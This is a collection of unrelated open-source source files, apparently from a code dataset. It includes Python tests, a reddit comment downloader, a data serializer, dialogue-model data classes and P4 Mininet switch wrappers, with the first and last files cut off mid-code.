logging.info("Querying NFDomains endpoint %s...", endpoint)
url = f"{base_url}/{endpoint}"
response = self.session.get(url, params=params)
return response.json(), response.status_code
|
tests/test_basics.py | viki-org/logstash-docker | 305 | 47400 | <filename>tests/test_basics.py
from .fixtures import logstash
from .constants import logstash_version_string
def test_logstash_is_the_correct_version(logstash):
assert logstash_version_string in logstash.stdout_of('logstash --version')
def test_the_default_user_is_logstash(logstash):
assert logstash.stdout_of('whoami') == 'logstash'
def test_that_the_user_home_directory_is_usr_share_logstash(logstash):
assert logstash.environment('HOME') == '/usr/share/logstash'
def test_locale_variables_are_set_correctly(logstash):
assert logstash.environment('LANG') == 'en_US.UTF-8'
assert logstash.environment('LC_ALL') == 'en_US.UTF-8'
def test_opt_logstash_is_a_symlink_to_usr_share_logstash(logstash):
assert logstash.stdout_of('realpath /opt/logstash') == '/usr/share/logstash'
def test_all_logstash_files_are_owned_by_logstash(logstash):
assert logstash.stdout_of('find /usr/share/logstash ! -user logstash') == ''
def test_logstash_user_is_uid_1000(logstash):
assert logstash.stdout_of('id -u logstash') == '1000'
def test_logstash_user_is_gid_1000(logstash):
assert logstash.stdout_of('id -g logstash') == '1000'
def test_logging_config_does_not_log_to_files(logstash):
assert logstash.stdout_of('grep RollingFile /logstash/config/log4j2.properties') == ''
# REF: https://docs.openshift.com/container-platform/3.5/creating_images/guidelines.html
def test_all_files_in_logstash_directory_are_gid_zero(logstash):
bad_files = logstash.stdout_of('find /usr/share/logstash ! -gid 0').split()
assert len(bad_files) is 0
def test_all_directories_in_logstash_directory_are_setgid(logstash):
bad_dirs = logstash.stdout_of('find /usr/share/logstash -type d ! -perm /g+s').split()
assert len(bad_dirs) is 0
|
rotkehlchen/tests/unit/uniswap/test_calculate_events_balances.py | rotkehlchenio/rotkehlchen | 137 | 47406 | <filename>rotkehlchen/tests/unit/uniswap/test_calculate_events_balances.py
from typing import List
import pytest
from rotkehlchen.chain.ethereum.interfaces.ammswap.types import LiquidityPool, LiquidityPoolEvent
from .utils import (
LP_1_EVENTS,
LP_1_EVENTS_BALANCE,
LP_2_EVENTS,
LP_2_EVENTS_BALANCE,
LP_3_BALANCE,
LP_3_EVENTS,
LP_3_EVENTS_BALANCE,
TEST_ADDRESS_1,
)
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_no_events_no_balances(rotkehlchen_api_server):
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
events: List[LiquidityPoolEvent] = []
balances: List[LiquidityPool] = []
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=events,
balances=balances,
)
assert events_balances == []
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_single_pool_without_balances(rotkehlchen_api_server):
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
balances: List[LiquidityPool] = []
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=LP_1_EVENTS,
balances=balances,
)
assert events_balances == [LP_1_EVENTS_BALANCE]
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_multiple_pools_without_balances(rotkehlchen_api_server):
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
events = list(LP_1_EVENTS)
events.extend(LP_2_EVENTS)
balances: List[LiquidityPool] = []
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=events,
balances=balances,
)
assert events_balances == [LP_1_EVENTS_BALANCE, LP_2_EVENTS_BALANCE]
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_single_pool_with_balances(rotkehlchen_api_server):
"""Test LP current balances are factorized in the pool events balance
"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=LP_3_EVENTS,
balances=[LP_3_BALANCE],
)
assert events_balances == [LP_3_EVENTS_BALANCE]
|
e2e/test_override.py | navoday-91/oncall | 857 | 47432 | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import requests
import time
from testutils import prefix,api_v0
start, end = int(time.time()), int(time.time() + 36000)
start = start / 1000 * 1000
end = end / 1000 * 1000
# Helper function to send an override request
def override(start_time, end_time, ev_ids, user):
re = requests.post(api_v0('events/override'),
json={'start': start_time,
'end': end_time,
'event_ids': ev_ids,
'user': user})
assert re.status_code == 200
return re
# Test override when events need to be split
@prefix('test_v0_override_split')
def test_api_v0_override_split(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start + 100, end - 100, [ev_id], override_user)
data = re.json()
assert len(data) == 3
re = requests.get(api_v0('events?user=' + user_name))
events = sorted(re.json(), key=lambda x: x['start'])
assert len(events) == 2
assert events[0]['end'] == start + 100
assert events[1]['start'] == end - 100
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start + 100
assert events[0]['end'] == end - 100
# Test override when an event's start needs to be edited
@prefix('test_v0_override_edit_start')
def test_api_v0_override_edit_start(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start, end - 100, [ev_id], override_user)
data = re.json()
assert len(data) == 2
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 1
assert events[0]['end'] == end
assert events[0]['start'] == end - 100
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end - 100
# Test override when an event's end needs to be edited
@prefix('test_api_v0_override_edit_end')
def test_api_v0_override_edit_end(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start + 100, end, [ev_id], override_user)
data = re.json()
assert len(data) == 2
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 1
assert events[0]['end'] == start + 100
assert events[0]['start'] == start
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start + 100
assert events[0]['end'] == end
# Test override when an event needs to be deleted
@prefix('test_api_v0_override_delete')
def test_api_v0_override_delete(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start - 10, end + 10, [ev_id], override_user)
assert len(re.json()) == 1
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 0
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end
# Test combination of above cases
@prefix('test_api_v0_override_multiple')
def test_api_v0_override_multiple(team, user, role, event):
team_name = team.create()
role_name = role.create()
user_name = user.create()
override_user = user.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev1 = event.create({'start': start-1000,
'end': start+1000,
'user': user_name,
'team': team_name,
'role': role_name})
ev2 = event.create({'start': start+1000,
'end': start+2000,
'user': user_name,
'team': team_name,
'role': role_name})
ev3 = event.create({'start': start+2000,
'end': end-1000,
'user': user_name,
'team': team_name,
'role': role_name})
ev4 = event.create({'start': end-1000,
'end': end+1000,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start, end, [ev1, ev2, ev3, ev4], override_user)
assert len(re.json()) == 3
re = requests.get(api_v0('events?user=' + user_name))
events = sorted(re.json(), key=lambda x: x['start'])
assert len(events) == 2
assert events[0]['start'] == start - 1000
assert events[0]['end'] == start
assert events[1]['start'] == end
assert events[1]['end'] == end + 1000
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end
|
openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | 164 | 47443 | from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from openbook_notifications.models.notification import Notification
from openbook_posts.models import PostReaction
class PostReactionNotification(models.Model):
notification = GenericRelation(Notification, related_name='post_reaction_notifications')
post_reaction = models.ForeignKey(PostReaction, on_delete=models.CASCADE)
@classmethod
def create_post_reaction_notification(cls, post_reaction_id, owner_id):
post_reaction_notification = cls.objects.create(post_reaction_id=post_reaction_id)
Notification.create_notification(type=Notification.POST_REACTION,
content_object=post_reaction_notification,
owner_id=owner_id)
return post_reaction_notification
@classmethod
def delete_post_reaction_notification(cls, post_reaction_id, owner_id):
cls.objects.filter(post_reaction_id=post_reaction_id,
notification__owner_id=owner_id).delete()
@classmethod
def delete_post_reaction_notifications(cls, post_reaction_id):
cls.objects.filter(post_reaction_id=post_reaction_id).delete()
|
scripts/subreddit_comments_alt.py | awesome-archive/subreddit-analyzer | 497 | 47456 | <filename>scripts/subreddit_comments_alt.py
"""
This script uses the Pushshift API to download comments from the specified subreddits.
By default it downloads all the comments from the newest one to the first one of the specified date.
"""
import csv
import sys
import time
from datetime import datetime
import requests
# 10,000 should cover at least 3 years of comments.
sys.setrecursionlimit(10000)
SUBREDDITS = ["mexico"]
HEADERS = {"User-Agent": "Comments Downloader v0.2"}
COMMENTS_LIST = list()
# Year month and day.
TARGET_DATE = "2019-01-01"
TARGET_TIMESTAMP = datetime.fromisoformat(TARGET_DATE).timestamp()
def init():
"""Iterates over all the subreddits and creates their csv files."""
for subreddit in SUBREDDITS:
writer = csv.writer(open("./{}-comments.csv".format(subreddit),
"w", newline="", encoding="utf-8"))
# Adding the header.
writer.writerow(["datetime", "author", "body"])
print("Downloading:", subreddit)
load_comments(subreddit, writer)
def load_comments(subreddit, writer, latest_timestamp=None):
"""Keeps downloading comments using recursion, it saves them 500 at a time.
Parameters
----------
subreddit : str
The desired subreddit.
write: csv.writer
A writer object that will save the comments to disk.
latest_timestamp: int
The timestampf of the latest comment.
"""
base_url = "https://api.pushshift.io/reddit/comment/search/"
params = {"subreddit": subreddit, "sort": "desc",
"sort_type": "created_utc", "size": 500}
stop_loading = False
# After the first call of this function we will use the 'before' parameter.
if latest_timestamp != None:
params["before"] = latest_timestamp
with requests.get(base_url, params=params, headers=HEADERS) as response:
json_data = response.json()
total_comments = len(json_data["data"])
latest_timestamp = 0
print("Downloading: {} comments".format(total_comments))
for item in json_data["data"]:
# We will only take 3 properties, the timestamp, author and body.
latest_timestamp = item["created_utc"]
iso_date = datetime.fromtimestamp(latest_timestamp)
if latest_timestamp <= TARGET_TIMESTAMP:
stop_loading = True
break
COMMENTS_LIST.append(
[iso_date, item["author"], item["body"]])
writer.writerows(COMMENTS_LIST)
COMMENTS_LIST.clear()
if total_comments < 500:
print("No more r○esults.")
elif stop_loading:
print("Download complete.")
else:
time.sleep(1.2)
load_comments(subreddit, writer, latest_timestamp)
if __name__ == "__main__":
init()
|
ch02-安装OpenCV/最简单-使用pip安装opencv-python和opencv-contrib-python/test_video.py | makelove/OpenCV-Python-Tutorial | 2,875 | 47463 | # -*- coding: utf-8 -*-
# @Time : 2017/8/2 10:46
# @Author : play4fun
# @File : test_video.py
# @Software: PyCharm
"""
test_video.py:
"""
import numpy as np
import cv2
from matplotlib import pyplot as plt
cap = cv2.VideoCapture('../../data/vtest.avi')#不支持读取视频
# cap = cv2.VideoCapture('output.avi')
# cap = cv2.VideoCapture('Minions_banana.mp4')
# 帧率
fps = cap.get(cv2.CAP_PROP_FPS) # 25.0
print("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))
# 总共有多少帧
num_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
print('共有', num_frames, '帧')
#
frame_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
print('高:', frame_height, '宽:', frame_width)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES) # 第0帧
print('当前帧数', FRAME_NOW) # 当前帧数 0.0
# 读取指定帧,对视频文件才有效,对摄像头无效??
# frame_no = 121
# cap.set(1, frame_no) # Where frame_no is the frame you want
ret, frame = cap.read() # Read the frame
print(ret, frame)
# cv2.imshow('frame_no'+str(frame_no), frame)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES)
print('当前帧数', FRAME_NOW) # 当前帧数 122.0
if frame is not None:#出错
plt.imshow(frame)
# plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
plt.show() |
contrib/stack/alosStack/estimate_swath_offset.py | yuankailiu/isce2 | 1,133 | 47489 | #!/usr/bin/env python3
#
# Author: <NAME>
# Copyright 2015-present, NASA-JPL/Caltech
#
import os
import glob
import datetime
import numpy as np
import isce, isceobj
from isceobj.Alos2Proc.runSwathOffset import swathOffset
from StackPulic import loadTrack
from StackPulic import acquisitionModesAlos2
def cmdLineParse():
'''
command line parser.
'''
import sys
import argparse
parser = argparse.ArgumentParser(description='estimate swath offset')
parser.add_argument('-idir', dest='idir', type=str, required=True,
help = 'data directory')
parser.add_argument('-date', dest='date', type=str, required=True,
help = 'data acquisition date. format: YYMMDD')
parser.add_argument('-output', dest='output', type=str, required=True,
help = 'output file')
#parser.add_argument('-match', dest='match', type=int, default=1,
# help = 'do matching when computing adjacent swath offset. 0: no. 1: yes (default)')
parser.add_argument('-match', dest='match', action='store_true', default=False,
help='do matching when computing adjacent swath offset')
if len(sys.argv) <= 1:
print('')
parser.print_help()
sys.exit(1)
else:
return parser.parse_args()
if __name__ == '__main__':
inps = cmdLineParse()
#get user parameters from input
idir = inps.idir
date = inps.date
outputFile = inps.output
match = inps.match
#######################################################
spotlightModes, stripmapModes, scansarNominalModes, scansarWideModes, scansarModes = acquisitionModesAlos2()
frames = sorted([x[-4:] for x in glob.glob(os.path.join(idir, 'f*_*'))])
track = loadTrack(idir, date)
#save current dir
dirOriginal = os.getcwd()
os.chdir(idir)
if (track.operationMode in scansarModes) and (len(track.frames[0].swaths) >= 2):
for i, frameNumber in enumerate(frames):
frameDir = 'f{}_{}'.format(i+1, frameNumber)
os.chdir(frameDir)
mosaicDir = 'mosaic'
os.makedirs(mosaicDir, exist_ok=True)
os.chdir(mosaicDir)
#compute swath offset
offsetReference = swathOffset(track.frames[i], date+'.slc', outputFile,
crossCorrelation=match, numberOfAzimuthLooks=10)
os.chdir('../../')
else:
print('there is only one swath, no need to estimate swath offset')
|
tests/functions/test_get_referencing_foreign_keys.py | tteaka/sqlalchemy-utils | 879 | 47495 | <gh_stars>100-1000
import pytest
import sqlalchemy as sa
from sqlalchemy_utils import get_referencing_foreign_keys
class TestGetReferencingFksWithCompositeKeys(object):
@pytest.fixture
def User(self, Base):
class User(Base):
__tablename__ = 'user'
first_name = sa.Column(sa.Unicode(255), primary_key=True)
last_name = sa.Column(sa.Unicode(255), primary_key=True)
return User
@pytest.fixture
def Article(self, Base, User):
class Article(Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
author_first_name = sa.Column(sa.Unicode(255))
author_last_name = sa.Column(sa.Unicode(255))
__table_args__ = (
sa.ForeignKeyConstraint(
[author_first_name, author_last_name],
[User.first_name, User.last_name]
),
)
return Article
@pytest.fixture
def init_models(self, User, Article):
pass
def test_with_declarative_class(self, User, Article):
fks = get_referencing_foreign_keys(User)
assert Article.__table__.foreign_keys == fks
def test_with_table(self, User, Article):
fks = get_referencing_foreign_keys(User.__table__)
assert Article.__table__.foreign_keys == fks
class TestGetReferencingFksWithInheritance(object):
@pytest.fixture
def User(self, Base):
class User(Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.Unicode)
first_name = sa.Column(sa.Unicode(255))
last_name = sa.Column(sa.Unicode(255))
__mapper_args__ = {
'polymorphic_on': 'type'
}
return User
@pytest.fixture
def Admin(self, User):
class Admin(User):
__tablename__ = 'admin'
id = sa.Column(
sa.Integer, sa.ForeignKey(User.id), primary_key=True
)
return Admin
@pytest.fixture
def TextItem(self, Base, User):
class TextItem(Base):
__tablename__ = 'textitem'
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.Unicode)
author_id = sa.Column(sa.Integer, sa.ForeignKey(User.id))
__mapper_args__ = {
'polymorphic_on': 'type'
}
return TextItem
@pytest.fixture
def Article(self, TextItem):
class Article(TextItem):
__tablename__ = 'article'
id = sa.Column(
sa.Integer, sa.ForeignKey(TextItem.id), primary_key=True
)
__mapper_args__ = {
'polymorphic_identity': 'article'
}
return Article
@pytest.fixture
def init_models(self, User, Admin, TextItem, Article):
pass
def test_with_declarative_class(self, Admin, TextItem):
fks = get_referencing_foreign_keys(Admin)
assert TextItem.__table__.foreign_keys == fks
def test_with_table(self, Admin):
fks = get_referencing_foreign_keys(Admin.__table__)
assert fks == set([])
|
mars/serialization/arrow.py | hxri/mars | 2,413 | 47498 | <reponame>hxri/mars
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union, List, Dict, Any
from .core import Serializer, buffered
try:
import pyarrow as pa
pa_types = Union[pa.Table, pa.RecordBatch]
except ImportError: # pragma: no cover
pa = None
pa_types = Any
class ArrowBatchSerializer(Serializer):
serializer_name = 'arrow'
@buffered
def serialize(self, obj: pa_types, context: Dict):
header = {}
sink = pa.BufferOutputStream()
writer = pa.RecordBatchStreamWriter(sink, obj.schema)
if isinstance(obj, pa.Table):
header['type'] = 'Table'
writer.write_table(obj)
else:
header['type'] = 'Batch'
writer.write_batch(obj)
writer.close()
buf = sink.getvalue()
buffers = [buf]
return header, buffers
def deserialize(self, header: Dict, buffers: List, context: Dict):
reader = pa.RecordBatchStreamReader(pa.BufferReader(buffers[0]))
if header['type'] == 'Table':
return reader.read_all()
else:
return reader.read_next_batch()
if pa is not None: # pragma: no branch
ArrowBatchSerializer.register(pa.Table)
ArrowBatchSerializer.register(pa.RecordBatch)
|
python/ql/test/3/library-tests/modules/general/main.py | vadi2/codeql | 4,036 | 47504 | import package
import helper
import package.assistant
#We expect that 'a' below will be 1 not a module.
from confused_elements import a
import sys |
deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 5,893 | 47508 | <filename>deeppavlov/models/go_bot/dto/dataset_features.py<gh_stars>1000+
from typing import List
import numpy as np
# todo remove boilerplate duplications
# todo comments
# todo logging
# todo naming
from deeppavlov.models.go_bot.nlu.dto.nlu_response import NLUResponse
from deeppavlov.models.go_bot.policy.dto.digitized_policy_features import DigitizedPolicyFeatures
from deeppavlov.models.go_bot.tracker.dto.dst_knowledge import DSTKnowledge
from copy import deepcopy
class UtteranceFeatures:
"""
the DTO-like class storing the training features of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_mask: np.ndarray
attn_key: np.ndarray
tokens_embeddings_padded: np.ndarray
features: np.ndarray
def __init__(self,
nlu_response: NLUResponse,
tracker_knowledge: DSTKnowledge,
features: DigitizedPolicyFeatures):
self.action_mask = features.action_mask
self.attn_key = features.attn_key
tokens_vectorized = nlu_response.tokens_vectorized # todo proper oop
self.tokens_embeddings_padded = tokens_vectorized.tokens_embeddings_padded
self.features = features.concat_feats
class UtteranceTarget:
"""
the DTO-like class storing the training target of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_id: int
def __init__(self, action_id):
self.action_id = action_id
class UtteranceDataEntry:
"""
the DTO-like class storing both the training features and target
of a single utterance of a dialog (to feed the GO-bot policy model)
"""
features: UtteranceFeatures
target: UtteranceTarget
def __init__(self, features, target):
self.features = features
self.target = target
@staticmethod
def from_features_and_target(features: UtteranceFeatures, target: UtteranceTarget):
return UtteranceDataEntry(deepcopy(features), deepcopy(target))
@staticmethod
def from_features(features: UtteranceFeatures):
return UtteranceDataEntry(deepcopy(features), UtteranceTarget(None))
class DialogueFeatures:
"""
the DTO-like class storing both the training features
of a dialog (to feed the GO-bot policy model)
"""
action_masks: List[np.ndarray]
attn_keys: List[np.ndarray]
tokens_embeddings_paddeds: List[np.ndarray]
featuress: List[np.ndarray]
def __init__(self):
self.action_masks = []
self.attn_keys = []
self.tokens_embeddings_paddeds = []
self.featuress = []
def append(self, utterance_features: UtteranceFeatures):
self.action_masks.append(utterance_features.action_mask)
self.attn_keys.append(utterance_features.attn_key)
self.tokens_embeddings_paddeds.append(utterance_features.tokens_embeddings_padded)
self.featuress.append(utterance_features.features)
def __len__(self):
return len(self.featuress)
class DialogueTargets:
"""
the DTO-like class storing both the training targets
of a dialog (to feed the GO-bot policy model)
"""
action_ids: List[int]
def __init__(self):
self.action_ids = []
def append(self, utterance_target: UtteranceTarget):
self.action_ids.append(utterance_target.action_id)
def __len__(self):
return len(self.action_ids)
class DialogueDataEntry:
"""
the DTO-like class storing both the training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: DialogueFeatures
targets: DialogueTargets
def __init__(self):
self.features = DialogueFeatures()
self.targets = DialogueTargets()
def append(self, utterance_features: UtteranceDataEntry):
self.features.append(utterance_features.features)
self.targets.append(utterance_features.target)
def __len__(self):
return len(self.features)
class PaddedDialogueFeatures(DialogueFeatures):
"""
the DTO-like class storing both the **padded to some specified length** training features
of a dialog (to feed the GO-bot policy model)
"""
padded_dialogue_length_mask: List[int]
def __init__(self, dialogue_features: DialogueFeatures, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_features)
self.padded_dialogue_length_mask = [1] * len(dialogue_features) + [0] * padding_length
self.action_masks = dialogue_features.action_masks + \
[np.zeros_like(dialogue_features.action_masks[0])] * padding_length
self.attn_keys = dialogue_features.attn_keys + [np.zeros_like(dialogue_features.attn_keys[0])] * padding_length
self.tokens_embeddings_paddeds = dialogue_features.tokens_embeddings_paddeds + \
[np.zeros_like(
dialogue_features.tokens_embeddings_paddeds[0])] * padding_length
self.featuress = dialogue_features.featuress + [np.zeros_like(dialogue_features.featuress[0])] * padding_length
class PaddedDialogueTargets(DialogueTargets):
"""
the DTO-like class storing both the **padded to some specified length** training targets
of a dialog (to feed the GO-bot policy model)
"""
def __init__(self, dialogue_targets: DialogueTargets, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_targets)
self.action_ids = dialogue_targets.action_ids + [0] * padding_length
class PaddedDialogueDataEntry(DialogueDataEntry):
"""
the DTO-like class storing both the **padded to some specified length** training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: PaddedDialogueFeatures
targets: PaddedDialogueTargets
def __init__(self, dialogue_data_entry: DialogueDataEntry, sequence_length):
super().__init__()
self.features = PaddedDialogueFeatures(dialogue_data_entry.features, sequence_length)
self.targets = PaddedDialogueTargets(dialogue_data_entry.targets, sequence_length)
class BatchDialoguesFeatures:
"""
the DTO-like class storing both the training features
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_masks: List[List[np.ndarray]]
b_attn_keys: List[List[np.ndarray]]
b_tokens_embeddings_paddeds: List[List[np.ndarray]]
b_featuress: List[List[np.ndarray]]
b_padded_dialogue_length_mask: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_masks = []
self.b_attn_keys = []
self.b_tokens_embeddings_paddeds = []
self.b_featuress = []
self.b_padded_dialogue_length_mask = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_features: PaddedDialogueFeatures):
self.b_action_masks.append(padded_dialogue_features.action_masks)
self.b_attn_keys.append(padded_dialogue_features.attn_keys)
self.b_tokens_embeddings_paddeds.append(padded_dialogue_features.tokens_embeddings_paddeds)
self.b_featuress.append(padded_dialogue_features.featuress)
self.b_padded_dialogue_length_mask.append(padded_dialogue_features.padded_dialogue_length_mask)
def __len__(self):
return len(self.b_featuress)
class BatchDialoguesTargets:
"""
the DTO-like class storing both the training targets
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_ids: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_ids = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_targets: PaddedDialogueTargets):
self.b_action_ids.append(padded_dialogue_targets.action_ids)
def __len__(self):
return len(self.b_action_ids)
class BatchDialoguesDataset:
"""
the DTO-like class storing both the training features and target
of a batch of dialogues. (to feed the GO-bot policy model)
Handles the dialogues padding.
"""
features: BatchDialoguesFeatures
targets: BatchDialoguesTargets
def __init__(self, max_dialogue_length):
self.features = BatchDialoguesFeatures(max_dialogue_length)
self.targets = BatchDialoguesTargets(max_dialogue_length)
self.max_dialogue_length = max_dialogue_length
def append(self, dialogue_features: DialogueDataEntry):
padded_dialogue_features = PaddedDialogueDataEntry(dialogue_features, self.max_dialogue_length)
self.features.append(padded_dialogue_features.features)
self.targets.append(padded_dialogue_features.targets)
def __len__(self):
return len(self.features)
|
mininet/p4_mininet.py | ghostli123/p4factory | 205 | 47529 | # Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, subprocess, select, time, re, pty
from mininet.util import isShellBuiltin
from mininet.net import Mininet
from mininet.node import Switch, Host
from mininet.log import setLogLevel, info
class P4Host(Host):
def config(self, **params):
r = super(Host, self).config(**params)
self.defaultIntf().rename("eth0")
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload eth0 %s off" % off
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
def describe(self):
print "**********"
print self.name
print "default interface: %s\t%s\t%s" %(
self.defaultIntf().name,
self.defaultIntf().IP(),
self.defaultIntf().MAC()
)
print "**********"
class P4Switch(Switch):
"""P4 virtual switch"""
listenerPort = 11111
thriftPort = 22222
def __init__( self, name, sw_path = "dc_full",
thrift_port = None,
pcap_dump = False,
verbose = False, **kwargs ):
Switch.__init__( self, name, **kwargs )
self.sw_path = sw_path
self.verbose = verbose
logfile = '/tmp/p4ns.%s.log' % self.name
self.output = open(logfile, 'w')
self.thrift_port = thrift_port
self.pcap_dump = pcap_dump
@classmethod
def setup( cls ):
pass
def start( self, controllers ):
"Start up a new P4 switch"
print "Starting P4 switch", self.name
args = [self.sw_path]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--listener', '127.0.0.1:%d' % self.listenerPort] )
self.listenerPort += 1
# FIXME
if self.thrift_port:
thrift_port = self.thrift_port
else:
thrift_port = self.thriftPort
self.thriftPort += 1
args.extend( ['--pd-server', '127.0.0.1:%d' % thrift_port] )
if not self.pcap_dump:
args.append( '--no-cli' )
args.append( self.opts )
logfile = '/tmp/p4ns.%s.log' % self.name
print ' '.join(args)
self.cmd( ' '.join(args) + ' >' + logfile + ' 2>&1 </dev/null &' )
#self.cmd( ' '.join(args) + ' > /dev/null 2>&1 < /dev/null &' )
print "switch has been started"
def stop( self ):
"Terminate IVS switch."
self.output.flush()
self.cmd( 'kill %' + self.sw_path )
self.cmd( 'wait' )
self.deleteIntfs()
def attach( self, intf ):
"Connect a data port"
print "Connecting data port", intf, "to switch", self.name
self.cmd( 'p4ns-ctl', 'add-port', '--datapath', self.name, intf )
def detach( self, intf ):
"Disconnect a data port"
self.cmd( 'p4ns-ctl', 'del-port', '--datapath', self.name, intf )
def dpctl( self, *args ):
"Run dpctl command"
pass
# Based on code from
# http://techandtrains.com/2014/08/21/docker-container-as-mininet-host/
class P4DockerSwitch(Switch):
"""P4 virtual switch running in a docker conatiner"""
def __init__( self, name, target_name = 'p4dockerswitch',
thrift_port = None, target_dir = 'switch',
sai_port = None,
swapi_port = None,
pcap_dump = False,
verbose = False,
start_program = '/p4factory/tools/start.sh',
config_fs = None,
pps = 0,
qdepth = 0,
**kwargs ):
self.verbose = verbose
self.pcap_dump = pcap_dump
self.start_program = start_program
self.config_fs = config_fs
self.target_name = target_name
self.target_dir = target_dir
self.thrift_port = thrift_port
self.sai_port = sai_port
self.swapi_port = swapi_port
self.pps = pps
self.qdepth = qdepth
Switch.__init__( self, name, **kwargs )
self.inNamespace = True
@classmethod
def setup( cls ):
pass
def sendCmd( self, *args, **kwargs ):
assert not self.waiting
printPid = kwargs.get( 'printPid', True )
# Allow sendCmd( [ list ] )
if len( args ) == 1 and type( args[ 0 ] ) is list:
cmd = args[ 0 ]
# Allow sendCmd( cmd, arg1, arg2... )
elif len( args ) > 0:
cmd = args
# Convert to string
if not isinstance( cmd, str ):
cmd = ' '.join( [ str( c ) for c in cmd ] )
if not re.search( r'\w', cmd ):
# Replace empty commands with something harmless
cmd = 'echo -n'
self.lastCmd = cmd
printPid = printPid and not isShellBuiltin( cmd )
if len( cmd ) > 0 and cmd[ -1 ] == '&':
